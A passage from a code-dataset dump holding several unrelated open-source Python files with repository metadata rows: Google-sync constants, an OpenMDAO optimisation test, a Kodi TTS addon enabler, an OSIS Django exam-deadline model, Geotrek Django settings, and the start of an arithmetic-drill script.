GOOGLE_CONTACTS_MAXRESULTS = 1000
"""upper limit of result set when querying google contacts api"""
GOOGLE_CALENDAR_APPNAME = "pisi" + PISI_VERSION
"""application name to use for connecting against google calendar services"""
GOOGLE_CALENDAR_MAXRESULTS = GOOGLE_CONTACTS_MAXRESULTS
"""upper limit of result set when querying google calendar api"""
FILEDOWNLOAD_TIMEOUT = 10
"""Timeout for socket opeations (e.g. http download) in seconds - None for disable"""
FILEDOWNLOAD_TMPFILE = "/tmp/pisi-remotebuffer.data"
"""Temporary file for buffering information from remote file sources"""
VCF_BYTES_PER_ENTRY = 200
"""For guessing the number of entries inside a VCF file by evaluating its size we need an estimation of the size for a single entry - for the purpose of showing some progress"""
ICS_BYTES_PER_ENTRY = 200
"""For guessing the number of entries inside an ICS file by evaluating its size we need an estimation of the size for a single entry - for the purpose of showing some progress"""
| gpl-3.0 | -7,278,563,369,972,107,000 | 48.244186 | 178 | 0.756789 | false | 3.885321 | false | false | false |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/openmdao.main-0.13.0-py2.7.egg/openmdao/main/test/test_scaler_adder_example.py | 1 | 5419 | """ Tests the scaler/adder example in our docs. This test was inconvenient to test
in its place in the docs. """
# pylint: disable-msg=C0111,C0103
import unittest
from openmdao.lib.datatypes.api import Float
from openmdao.lib.drivers.api import SLSQPdriver
from openmdao.main.api import Assembly,Component
from openmdao.main.test.simpledriver import SimpleDriver
from openmdao.util.testutil import assert_rel_error
class Paraboloid_scale(Component):
""" Evaluates the equation f(x,y) = (1000*x-3)^2 + (1000*x)*(0.01*y) + (0.01*y+4)^2 - 3 """
# set up interface to the framework
# pylint: disable-msg=E1101
x = Float(0.0, iotype='in', desc='The variable x')
y = Float(0.0, iotype='in', desc='The variable y')
f_xy = Float(iotype='out', desc='F(x,y)')
def execute(self):
"""f(x,y) = (x-3)^2 + xy + (y+4)^2 - 3
Optimal solution (minimum): x = 0.0066666666666666671; y = -733.33333333333337
"""
x = self.x
y = self.y
self.f_xy = (1000.*x-3.)**2 + (1000.*x)*(0.01*y) + (0.01*y+4.)**2 - 3.
#print "Executing, %.33f, %.33f, %.33f" % (x, y, self.f_xy)
class OptimizationUnconstrainedScale(Assembly):
"""Unconstrained optimization of the unscaled Paraboloid Component."""
def configure(self):
""" Creates a new Assembly containing an unscaled Paraboloid and an optimizer"""
# Create Optimizer instance
self.add('driver', SLSQPdriver())
# Create Paraboloid component instances
self.add('paraboloid', Paraboloid_scale())
# Driver process definition
self.driver.workflow.add('paraboloid')
# SQLSQP Flags
self.driver.iprint = 0
# Objective
self.driver.add_objective('paraboloid.f_xy')
# Design Variables
self.driver.add_parameter('paraboloid.x', low=-1000., high=1000., scaler=0.001)
self.driver.add_parameter('paraboloid.y', low=-1000., high=1000., scaler=1000.0)
class Paraboloid_shift(Component):
""" Evaluates the equation f(x,y) = (1000*x-3)^2 + (1000*x)*(0.01*(y+1000)) + (0.01*(y+1000)+4)^2 - 3 """
# set up interface to the framework
# pylint: disable-msg=E1101
x = Float(0.0, iotype='in', desc='The variable x')
y = Float(0.0, iotype='in', desc='The variable y')
f_xy = Float(iotype='out', desc='F(x,y)')
def execute(self):
"""f(x,y) = (1000*x-3)^2 + (1000*x)*(0.01*(y+1000)) + (0.01*(y+1000)+4)^2 - 3
Optimal solution (minimum): x = 0.0066666666666666671; y = -1733.33333333333337
"""
x = self.x
y = self.y
self.f_xy = (1000*x-3)**2 + (1000*x)*(0.01*(y+1000)) + (0.01*(y+1000)+4)**2 - 3
class OptimizationUnconstrainedScaleShift(Assembly):
"""Unconstrained optimization of the Paraboloid Component."""
def configure(self):
""" Creates a new Assembly containing a Paraboloid and an optimizer"""
# pylint: disable-msg=E1101
# Create Optimizer instance
self.add('driver', SLSQPdriver())
# Create Paraboloid component instances
self.add('paraboloid', Paraboloid_shift())
# Driver process definition
self.driver.workflow.add('paraboloid')
# SQLSQP Flags
self.driver.iprint = 0
# Objective
self.driver.add_objective('paraboloid.f_xy')
# Design Variables
self.driver.add_parameter('paraboloid.x', low=-1000000., high=1000000.,
scaler=0.001)
self.driver.add_parameter('paraboloid.y', low=-1000000., high=1000000.,
scaler=1000.0, adder=-1000.0)
class ScalerAdderExampleTestCase(unittest.TestCase):
def test_scale(self):
opt_problem = OptimizationUnconstrainedScale()
opt_problem.run()
assert_rel_error(self, opt_problem.paraboloid.x, 0.006667, 0.001)
assert_rel_error(self, opt_problem.paraboloid.y, -733.333313, 0.001)
J = opt_problem.driver.calc_gradient()
Jdict = opt_problem.driver.calc_gradient(return_format='dict')
def test_scale_gradients(self):
opt_problem = OptimizationUnconstrainedScale()
opt_problem.replace('driver', SimpleDriver())
opt_problem.run()
J = opt_problem.driver.calc_gradient()
Jdict = opt_problem.driver.calc_gradient(return_format='dict')
# Make sure untransforming works for dicts too
self.assertTrue(J[0][0] == Jdict['_pseudo_0.out0']['paraboloid.x'])
self.assertTrue(J[0][1] == Jdict['_pseudo_0.out0']['paraboloid.y'])
Jfddict = opt_problem.driver.calc_gradient(mode='fd', return_format='dict')
opt_problem.driver.run_iteration()
Jfd = opt_problem.driver.calc_gradient(mode='fd')
# Make sure untransforming works for dicts too
self.assertTrue(Jfd[0][0] == Jfddict['_pseudo_0.out0']['paraboloid.x'])
self.assertTrue(Jfd[0][1] == Jfddict['_pseudo_0.out0']['paraboloid.y'])
def test_scale_adder(self):
opt_problem = OptimizationUnconstrainedScaleShift()
opt_problem.run()
assert_rel_error(self, opt_problem.paraboloid.x, 0.006667, 0.001)
assert_rel_error(self, opt_problem.paraboloid.y, -1733.333313, 0.001)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | -6,789,788,535,626,708,000 | 33.737179 | 114 | 0.60823 | false | 3.314373 | true | false | false |
ruuk/service.xbmc.tts | enabler.py | 1 | 3477 | # -*- coding: utf-8 -*-
import os, sys, xbmc, xbmcaddon
DISABLE_PATH = os.path.join(xbmc.translatePath('special://profile').decode('utf-8'), 'addon_data', 'service.xbmc.tts', 'DISABLED')
ENABLE_PATH = os.path.join(xbmc.translatePath('special://profile').decode('utf-8'), 'addon_data', 'service.xbmc.tts', 'ENABLED')
def getXBMCVersion():
import json
resp = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "method": "Application.GetProperties", "params": {"properties": ["version", "name"]}, "id": 1 }')
data = json.loads(resp)
if not 'result' in data: return None
if not 'version' in data['result']: return None
return data['result']['version']
BASE = '{ "jsonrpc": "2.0", "method": "Addons.SetAddonEnabled", "params": { "addonid": "service.xbmc.tts","enabled":%s}, "id": 1 }'
def enableAddon():
if os.path.exists(DISABLE_PATH):
os.remove(DISABLE_PATH)
markPreOrPost(enable=True)
if isPostInstalled():
if addonIsEnabled():
xbmc.executebuiltin('RunScript(service.xbmc.tts)')
else:
xbmc.executeJSONRPC(BASE % 'true') #So enable it instead
else:
xbmc.executebuiltin('RunScript(service.xbmc.tts)')
def disableAddon():
if os.path.exists(ENABLE_PATH):
os.remove(ENABLE_PATH)
markPreOrPost(disable=True)
if isPostInstalled():
version = getXBMCVersion()
if not version or version['major'] < 13: return #Disabling in this manner crashes on Frodo
xbmc.executeJSONRPC(BASE % 'false') #Try to disable it
#if res and 'error' in res: #If we have an error, it's already disabled
#print res
def markPreOrPost(enable=False, disable=False):
if os.path.exists(ENABLE_PATH) or enable:
with open(ENABLE_PATH, 'w') as f:
f.write(isPostInstalled() and 'POST' or 'PRE')
if os.path.exists(DISABLE_PATH) or disable:
with open(DISABLE_PATH, 'w') as f:
f.write(isPostInstalled() and 'POST' or 'PRE')
def addonIsEnabled():
if os.path.exists(DISABLE_PATH):
return False
if isPostInstalled():
import json
resp = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 1, "method": "Addons.GetAddonDetails", "params": {"addonid":"service.xbmc.tts","properties": ["name","version","enabled"]}}')
data = json.loads(resp)
if not 'result' in data: return False
if not 'addon' in data['result']: return False
if not 'enabled' in data['result']['addon']: return False
return data['result']['addon']['enabled']
else:
return True
def toggleEnabled():
try:
if not addonIsEnabled(): raise Exception('Addon Disabled')
xbmcaddon.Addon('service.xbmc.tts')
xbmc.log('service.xbmc.tts: DISABLING')
xbmc.executebuiltin('XBMC.RunScript(service.xbmc.tts,key.SHUTDOWN)')
except:
xbmc.log('service.xbmc.tts: ENABLING')
enableAddon()
def reset():
if not addonIsEnabled(): return
disableAddon()
ct=0
while addonIsEnabled() and ct < 11:
xbmc.sleep(500)
ct+=1
enableAddon()
def isPostInstalled():
homePath = xbmc.translatePath('special://home').decode('utf-8')
postInstalledPath = os.path.join(homePath, 'addons', 'service.xbmc.tts')
return os.path.exists(postInstalledPath)
if __name__ == '__main__':
arg = None
if len(sys.argv) > 1: arg = sys.argv[1]
if arg == 'RESET':
reset()
else:
toggleEnabled() | gpl-2.0 | 9,017,643,453,152,437,000 | 32.12381 | 187 | 0.625252 | false | 3.494472 | false | false | false |
uclouvain/osis | base/models/session_exam_deadline.py | 1 | 4136 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import datetime
from django.db import models
from base.models.enums import number_session
from base.signals.publisher import compute_student_score_encoding_deadline
from osis_common.models.osis_model_admin import OsisModelAdmin
class SessionExamDeadlineAdmin(OsisModelAdmin):
list_display = ('offer_enrollment', 'deadline', 'deadline_tutor', 'number_session', 'changed')
list_filter = ('number_session',)
raw_id_fields = ('offer_enrollment',)
search_fields = ['offer_enrollment__student__person__first_name', 'offer_enrollment__student__person__last_name',
'offer_enrollment__student__registration_id', 'offer_enrollment__education_group_year__acronym']
class SessionExamDeadline(models.Model):
external_id = models.CharField(max_length=100, blank=True, null=True, db_index=True)
changed = models.DateTimeField(null=True, auto_now=True)
deadline = models.DateField()
deliberation_date = models.DateField(blank=True, null=True)
deadline_tutor = models.IntegerField(null=True, blank=True) # Delta day(s)
number_session = models.IntegerField(choices=number_session.NUMBERS_SESSION)
offer_enrollment = models.ForeignKey('OfferEnrollment', on_delete=models.CASCADE)
__original_deliberation_date = None
def __init__(self, *args, **kwargs):
super(SessionExamDeadline, self).__init__(*args, **kwargs)
self.__original_deliberation_date = self.deliberation_date
def save(self, *args, **kwargs):
super(SessionExamDeadline, self).save(*args, **kwargs)
if self.deliberation_date != self.__original_deliberation_date:
compute_student_score_encoding_deadline.send(sender=self.__class__, session_exam_deadline=self)
@property
def deadline_tutor_computed(self):
return compute_deadline_tutor(self.deadline, self.deadline_tutor)
@property
def is_deadline_reached(self):
return self.deadline < datetime.date.today()
@property
def is_deadline_tutor_reached(self):
if self.deadline_tutor_computed:
return self.deadline_tutor_computed < datetime.date.today()
return self.is_deadline_reached
def __str__(self):
return u"%s-%s" % (self.offer_enrollment, self.number_session)
def compute_deadline_tutor(deadline, deadline_tutor):
if deadline_tutor is not None:
return deadline - datetime.timedelta(days=deadline_tutor)
return None
def filter_by_nb_session(nb_session):
return SessionExamDeadline.objects.filter(number_session=nb_session)
def get_by_offer_enrollment_nb_session(offer_enrollment, nb_session):
try:
return SessionExamDeadline.objects.get(offer_enrollment=offer_enrollment.id,
number_session=nb_session)
except SessionExamDeadline.DoesNotExist:
return None
| agpl-3.0 | -3,591,662,348,334,433,300 | 42.072917 | 117 | 0.685127 | false | 3.897267 | false | false | false |
mabhub/Geotrek | geotrek/settings/base.py | 1 | 17906 | import os
import sys
from django.contrib.messages import constants as messages
from geotrek import __version__
from . import PROJECT_ROOT_PATH
def gettext_noop(s):
return s
DEBUG = False
TEMPLATE_DEBUG = DEBUG
TEST = 'test' in sys.argv
VERSION = __version__
ADMINS = (
('Makina Corpus', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'OPTIONS': {},
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
#
# PostgreSQL Schemas for apps and models.
#
# Caution: editing this setting might not be enough.
# Indeed, it won't apply to apps that not managed of South, nor database views and functions.
# See all sql/*-schemas.sql files in each Geotrek app.
#
DATABASE_SCHEMAS = {
'default': 'geotrek',
'auth': 'django',
'django': 'django',
'easy_thumbnails': 'django',
'south': 'django',
'feedback': 'gestion',
'infrastructure': 'gestion',
'maintenance': 'gestion',
'tourism': 'tourisme',
'trekking': 'rando',
'zoning': 'zonage',
'land': 'foncier',
}
DATABASES['default']['OPTIONS'] = {
'options': '-c search_path=public,%s' % ','.join(set(DATABASE_SCHEMAS.values()))
}
#
# Authentication
#
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',)
AUTH_PROFILE_MODULE = 'authent.UserProfile'
# Settings required for geotrek.authent.backend.DatabaseBackend :
AUTHENT_DATABASE = None
AUTHENT_TABLENAME = None
AUTHENT_GROUPS_MAPPING = {
'PATH_MANAGER': 1,
'TREKKING_MANAGER': 2,
'EDITOR': 3,
'READER': 4,
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/Paris'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'fr'
MODELTRANSLATION_DEFAULT_LANGUAGE = LANGUAGE_CODE
LANGUAGES = (
('en', gettext_noop('English')),
('fr', gettext_noop('French')),
('it', gettext_noop('Italian')),
('es', gettext_noop('Spanish')),
)
LOCALE_PATHS = (
os.path.join(PROJECT_ROOT_PATH, 'locale'),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
DATE_INPUT_FORMATS = ('%d/%m/%Y',)
ROOT_URL = ''
LOGIN_URL = 'login'
LOGOUT_URL = 'logout'
LOGIN_REDIRECT_URL = 'home'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT_PATH, 'media')
UPLOAD_DIR = 'upload' # media root subdir
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
MEDIA_URL_SECURE = '/media_secure/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT_PATH, 'static'),
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
'compressor.finders.CompressorFinder',
)
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
COMPRESSOR_ENABLED = False
COMPRESS_PARSER = 'compressor.parser.HtmlParser'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'public_key'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'geotrek.authent.middleware.LocaleForcedMiddleware',
'django.middleware.locale.LocaleMiddleware',
'geotrek.common.middleware.APILocaleMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
'geotrek.authent.middleware.CorsMiddleware',
'mapentity.middleware.AutoLoginMiddleware'
)
ROOT_URLCONF = 'geotrek.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'geotrek.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'mapentity.context_processors.settings',
)
#
# /!\ Application names (last levels) must be unique
# (c.f. auth/authent)
# https://code.djangoproject.com/ticket/12288
#
PROJECT_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.gis',
)
# Do not migrate translated fields, they differ per instance, and
# can be added/removed using `update_translation_fields`
if 'schemamigration' not in sys.argv:
PROJECT_APPS += ('modeltranslation',)
PROJECT_APPS += (
'south',
'leaflet',
'floppyforms',
'crispy_forms',
'compressor',
'djgeojson',
'tinymce',
'easy_thumbnails',
'shapes',
'paperclip',
'mapentity',
'rest_framework',
'embed_video',
'djcelery',
)
INSTALLED_APPS = PROJECT_APPS + (
'geotrek.cirkwi',
'geotrek.authent',
'geotrek.common',
'geotrek.altimetry',
'geotrek.core',
'geotrek.infrastructure',
'geotrek.maintenance',
'geotrek.zoning',
'geotrek.land',
'geotrek.trekking',
'geotrek.tourism',
'geotrek.flatpages',
'geotrek.feedback',
)
SERIALIZATION_MODULES = {
'geojson': 'djgeojson.serializers'
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
# The fat backend is used to store big chunk of data (>1 Mo)
'fat': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'formatters': {
'simple': {
'format': '%(levelname)s %(asctime)s %(name)s %(message)s'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'logging.NullHandler'
},
'console': {
'level': 'WARNING',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
'django.db.backends': {
'handlers': ['console', 'mail_admins'],
'level': 'ERROR',
'propagate': False,
},
'django.request': {
'handlers': ['console', 'mail_admins'],
'level': 'ERROR',
'propagate': False,
},
'django': {
'handlers': ['console', 'mail_admins'],
'level': 'ERROR',
'propagate': False,
},
'south': {
'handlers': ['console', 'mail_admins'],
'level': 'ERROR',
'propagate': False,
},
'geotrek': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
'propagate': False,
},
'mapentity': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
'propagate': False,
},
'': {
'handlers': ['console', 'mail_admins'],
'level': 'INFO',
'propagate': False,
},
}
}
THUMBNAIL_ALIASES = {
'': {
'thumbnail': {'size': (150, 150)},
# Thumbnails for public trek website
'small-square': {'size': (120, 120), 'crop': True},
'medium': {'size': (800, 800)},
# Header image for trek export (keep ratio of TREK_EXPORT_HEADER_IMAGE_SIZE)
'print': {'size': (1000, 500), 'crop': 'smart'},
},
}
PAPERCLIP_CONFIG = {
'ENABLE_VIDEO': True,
'FILETYPE_MODEL': 'common.FileType',
'ATTACHMENT_TABLE_NAME': 'fl_t_fichier',
}
# Data projection
SRID = 3857
# API projection (client-side), can differ from SRID (database). Leaflet requires 4326.
API_SRID = 4326
# Extent in native projection (Toulouse area)
SPATIAL_EXTENT = (144968, 5415668, 175412, 5388753)
MAPENTITY_CONFIG = {
'TITLE': gettext_noop("Geotrek"),
'TEMP_DIR': '/tmp',
'HISTORY_ITEMS_MAX': 7,
'CONVERSION_SERVER': 'http://127.0.0.1:6543',
'CAPTURE_SERVER': 'http://127.0.0.1:8001',
'ROOT_URL': ROOT_URL,
'MAP_BACKGROUND_FOGGED': True,
'GEOJSON_LAYERS_CACHE_BACKEND': 'fat',
'SENDFILE_HTTP_HEADER': 'X-Accel-Redirect',
'DRF_API_URL_PREFIX': r'^api/(?P<lang>\w+)/',
}
DEFAULT_STRUCTURE_NAME = gettext_noop('Default')
VIEWPORT_MARGIN = 0.1 # On list page, around spatial extent from settings.ini
PATHS_LINE_MARKER = 'dotL'
PATH_SNAPPING_DISTANCE = 1 # Distance of path snapping in meters
SNAP_DISTANCE = 30 # Distance of snapping in pixels
ALTIMETRIC_PROFILE_PRECISION = 25 # Sampling precision in meters
ALTIMETRIC_PROFILE_BACKGROUND = 'white'
ALTIMETRIC_PROFILE_COLOR = '#F77E00'
ALTIMETRIC_PROFILE_HEIGHT = 400
ALTIMETRIC_PROFILE_WIDTH = 800
ALTIMETRIC_PROFILE_FONTSIZE = 25
ALTIMETRIC_PROFILE_FONT = 'ubuntu'
ALTIMETRIC_PROFILE_MIN_YSCALE = 1200 # Minimum y scale (in meters)
ALTIMETRIC_AREA_MAX_RESOLUTION = 150 # Maximum number of points (by width/height)
ALTIMETRIC_AREA_MARGIN = 0.15
# Let this be defined at instance-level
LEAFLET_CONFIG = {
'SRID': SRID,
'TILES': [
('Scan', 'http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',),
('Ortho', 'http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.jpg'),
],
'TILES_EXTENT': SPATIAL_EXTENT,
# Extent in API projection (Leaflet view default extent)
'SPATIAL_EXTENT': (1.3, 43.7, 1.5, 43.5),
'NO_GLOBALS': False,
'PLUGINS': {
'geotrek': {'js': ['core/leaflet.lineextremities.js',
'core/leaflet.textpath.js',
'trekking/points_reference.js',
'trekking/parking_location.js']},
'topofields': {'js': ['core/geotrek.forms.snap.js',
'core/geotrek.forms.topology.js',
'core/dijkstra.js',
'core/multipath.js',
'core/topology_helper.js']}
}
}
""" This *pool* of colors is used to colorized lands records.
"""
COLORS_POOL = {'land': ['#f37e79', '#7998f3', '#bbf379', '#f379df', '#f3bf79', '#9c79f3', '#7af379'],
'physical': ['#f3799d', '#79c1f3', '#e4f379', '#de79f3', '#79f3ba', '#f39779', '#797ff3'],
'competence': ['#a2f379', '#f379c6', '#79e9f3', '#f3d979', '#b579f3', '#79f392', '#f37984'],
'signagemanagement': ['#79a8f3', '#cbf379', '#f379ee', '#79f3e3', '#79f3d3'],
'workmanagement': ['#79a8f3', '#cbf379', '#f379ee', '#79f3e3', '#79f3d3'],
'restrictedarea': ['plum', 'violet', 'deeppink', 'orchid',
'darkviolet', 'lightcoral', 'palevioletred',
'MediumVioletRed', 'MediumOrchid', 'Magenta',
'LightSalmon', 'HotPink', 'Fuchsia']}
MAP_STYLES = {
'path': {'weight': 2, 'opacity': 1.0, 'color': '#FF4800'},
'city': {'weight': 4, 'color': 'orange', 'opacity': 0.3, 'fillOpacity': 0.0},
'district': {'weight': 6, 'color': 'orange', 'opacity': 0.3, 'fillOpacity': 0.0, 'dashArray': '12, 12'},
'restrictedarea': {'weight': 2, 'color': 'red', 'opacity': 0.5, 'fillOpacity': 0.5},
'land': {'weight': 4, 'color': 'red', 'opacity': 1.0},
'physical': {'weight': 6, 'color': 'red', 'opacity': 1.0},
'competence': {'weight': 4, 'color': 'red', 'opacity': 1.0},
'workmanagement': {'weight': 4, 'color': 'red', 'opacity': 1.0},
'signagemanagement': {'weight': 5, 'color': 'red', 'opacity': 1.0},
'print': {
'path': {'weight': 1},
'trek': {'color': '#FF3300', 'weight': 7, 'opacity': 0.5,
'arrowColor': 'black', 'arrowSize': 10},
}
}
LAYER_PRECISION_LAND = 4 # Number of fraction digit
LAYER_SIMPLIFY_LAND = 10 # Simplification tolerance
LAND_BBOX_CITIES_ENABLED = True
LAND_BBOX_DISTRICTS_ENABLED = True
LAND_BBOX_AREAS_ENABLED = False
PUBLISHED_BY_LANG = True
EXPORT_MAP_IMAGE_SIZE = {
'trek': (14.1, 11),
'poi': (14.1, 11),
'touristiccontent': (14.1, 11),
'touristicevent': (14.1, 11),
}
EXPORT_HEADER_IMAGE_SIZE = {
'trek': (10.7, 5.35), # Keep ratio of THUMBNAIL_ALIASES['print']
'poi': (10.7, 5.35), # Keep ratio of THUMBNAIL_ALIASES['print']
'touristiccontent': (10.7, 5.35), # Keep ratio of THUMBNAIL_ALIASES['print']
'touristicevent': (10.7, 5.35), # Keep ratio of THUMBNAIL_ALIASES['print']
}
COMPLETENESS_FIELDS = {
'trek': ['departure', 'duration', 'difficulty', 'description_teaser']
}
TRAIL_MODEL_ENABLED = True
TREKKING_TOPOLOGY_ENABLED = True
FLATPAGES_ENABLED = False # False because still experimental
TOURISM_ENABLED = False # False because still experimental
TREK_POI_INTERSECTION_MARGIN = 500 # meters (used only if TREKKING_TOPOLOGY_ENABLED = False)
TOURISM_INTERSECTION_MARGIN = 500 # meters (always used)
SIGNAGE_LINE_ENABLED = False
TREK_POINTS_OF_REFERENCE_ENABLED = True
TREK_EXPORT_POI_LIST_LIMIT = 14
TREK_EXPORT_INFORMATION_DESK_LIST_LIMIT = 2
TREK_DAY_DURATION = 10 # Max duration to be done in one day
TREK_ICON_SIZE_POI = 18
TREK_ICON_SIZE_PARKING = 18
TREK_ICON_SIZE_INFORMATION_DESK = 18
# Static offsets in projection units
TOPOLOGY_STATIC_OFFSETS = {'land': -5,
'physical': 0,
'competence': 5,
'signagemanagement': -10,
'workmanagement': 10}
MESSAGE_TAGS = {
messages.SUCCESS: 'alert-success',
messages.INFO: 'alert-info',
messages.DEBUG: 'alert-info',
messages.WARNING: 'alert-error',
messages.ERROR: 'alert-error',
}
CACHE_TIMEOUT_LAND_LAYERS = 60 * 60 * 24
CACHE_TIMEOUT_TOURISM_DATASOURCES = 60 * 60 * 24
TREK_CATEGORY_ORDER = None
TOURISTIC_EVENT_CATEGORY_ORDER = None
SPLIT_TREKS_CATEGORIES_BY_PRACTICE = False
SPLIT_TREKS_CATEGORIES_BY_ACCESSIBILITY = False
HIDE_PUBLISHED_TREKS_IN_TOPOLOGIES = False
ZIP_TOURISTIC_CONTENTS_AS_POI = False
CRISPY_ALLOWED_TEMPLATE_PACKS = ('bootstrap', 'bootstrap3')
CRISPY_TEMPLATE_PACK = 'bootstrap'
# Mobile app_directories
MOBILE_TILES_URL = 'http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'
MOBILE_TILES_RADIUS_LARGE = 0.01 # ~1 km
MOBILE_TILES_RADIUS_SMALL = 0.005 # ~500 m
MOBILE_TILES_GLOBAL_ZOOMS = range(13)
MOBILE_TILES_LOW_ZOOMS = range(13, 15)
MOBILE_TILES_HIGH_ZOOMS = range(15, 17)
import djcelery
djcelery.setup_loader()
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
BROKER_URL = 'redis://127.0.0.1:6379/0'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TASK_RESULT_EXPIRES = 5
TEST_RUNNER = 'djcelery.contrib.test_runner.CeleryTestSuiteRunner'
| bsd-2-clause | -7,784,692,578,393,617,000 | 30.414035 | 108 | 0.631744 | false | 3.229798 | true | false | false |
sojournexx/python | Assignments/TanAndrew_assign6.py | 1 | 5318 | #Andrew Tan, 3/25, Section 010
import myfunctions
import random
#Ask user for inputs and check validity
while True:
qns = int(input("How many problems would you like to attempt? "))
if qns <= 0:
print("Invalid number, try again\n")
continue
else:
break
while True:
width = int(input("How wide do you want your digits to be? 5-10: "))
if width < 5 or width > 10:
print("Invalid width, try again\n")
continue
else:
break
while True:
drill = str.lower(input("Would you like to activate 'drill' mode? yes or no: "))
if drill != "yes" and drill != "no":
print("Invalid response, try again\n")
continue
else:
break
print("\nHere we go!")
#Define variables to track score and statistics
tscore = 0
addition = 0
subtraction = 0
multiplication = 0
division = 0
addition_score = 0
subtraction_score = 0
multiplication_score = 0
division_score = 0
#Set number of questions
for i in range(qns):
print("\nWhat is .....\n")
#Define parameters
x = random.randint(0, 9)
op = random.randint(1, 4)
y = random.randint(0, 9)
#Check for valid division equation
if op == 4:
if y == 0:
y = random.randint(1, 9)
while x % y != 0:
x = random.randint(0, 9)
y = random.randint(1, 9)
#Display first number
if x == 0:
myfunctions.number_0(width)
